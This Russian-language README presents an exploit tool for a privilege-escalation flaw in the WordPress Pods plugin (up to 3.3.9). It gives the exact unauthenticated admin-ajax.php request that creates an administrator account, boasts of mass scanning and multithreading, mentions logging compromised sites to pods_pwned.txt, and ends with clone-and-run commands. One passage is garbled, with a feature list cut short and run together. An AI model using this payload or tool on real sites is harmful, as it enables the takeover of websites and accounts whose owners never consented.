
Эксплуатирует CVE-2026-19598 в плагине WordPress Pods для создания учётных записей администратора или перезаписи паролей через неаутентифицированный AJAX-запрос, с поддержкой массового сканирования и многопоточности.
Критическое неавторизованное повышение привилегий (CVSS 9.8) — плагин Pods для WordPress ≤ 3.3.9
Этот инструмент эксплуатирует CVE-2026-19598, уязвимость в плагине Pods для WordPress, которая позволяет неавторизованным злоумышленникам создавать новые учётные записи администратора или перезаписывать пароли существующих пользователей через конечную точку admin-ajax.php.
| Свойство | Значение |
|---|---|
| CVE ID | CVE-2026-19598 |
| Оценка CVSS | 9.8 (Критическая) |
| CWE | CWE-284 — Некорректный контроль доступа |
| Затронутый продукт | Плагин Pods для WordPress ≤ 3.3.9 |
| Исправленная версия | 3.3.9.1 |
| Требуется аутентификация | НЕТ (неавторизованный) |
| Статус | Активная эксплуатация |
Уязвимость существует в AJAX-действии pods_admin. Из-за некорректных проверок разрешений метод save_user может быть вызван без аутентификации при наличии параметра meta-box-loader. Это позволяет злоумышленнику:
POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator
Плагин не проверяет, обладает ли пользователь, отправляющий запрос, необходимыми правами, а параметр meta-box-loader обходит предусмотренные проверки безопасности.
pods_pwned.txt со всеми скомпрометированными целямиrequests# Клонирование репозитория
git clone https://github.com/0xCyp1337/CVE-2026-19598.git
cd CVE-2026-19598
python3 CVE-2026-19598.py
# Установка зависимостей (нужен только requests)
pip install requests